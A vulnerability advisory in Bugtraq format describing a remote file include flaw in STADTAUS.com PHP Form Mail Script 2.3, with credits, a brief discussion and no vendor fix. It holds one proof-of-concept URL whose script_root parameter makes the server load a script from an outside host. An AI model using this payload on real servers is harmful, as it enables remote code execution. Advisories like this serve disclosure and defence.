BID:12735

Stadtaus.Com PHP Form Mail Script Remote File Include Vulnerability

Info

Stadtaus.Com PHP Form Mail Script Remote File Include Vulnerability

Bugtraq ID:	12735
Class:	Input Validation Error
CVE:
Remote:	Yes
Local:	No
Published:	Mar 05 2005 12:00AM
Updated:	Mar 05 2005 12:00AM
Credit:	Discovery is credited to Filip Groszynski <[email protected]>.
Vulnerable:	STADTAUS.com PHP Form Mail Script 2.3

Not Vulnerable:

Discussion

Stadtaus.Com PHP Form Mail Script Remote File Include Vulnerability

PHP Form Mail Script is prone to remote file include vulnerability.

An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.

PHP Form Mail Script 2.3 and prior versions are vulnerable to this issue.

Exploit / POC

Stadtaus.Com PHP Form Mail Script Remote File Include Vulnerability

An exploit is not required.

Proof of concept example is available:
http://www.example.com/[dir]/inc/form mail.inc.php?script_root=http://www.example.com/

Proof of concept FormMailScript_poc.pl was provided by mozako <[email protected]>.

/data/vulnerabilities/exploits/FormMailScript_poc.pl

Solution / Fix

Stadtaus.Com PHP Form Mail Script Remote File Include Vulnerability

Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.

References

Stadtaus.Com PHP Form Mail Script Remote File Include Vulnerability

References:

PHP Form Mail Script Product Page (STADTAUS.com)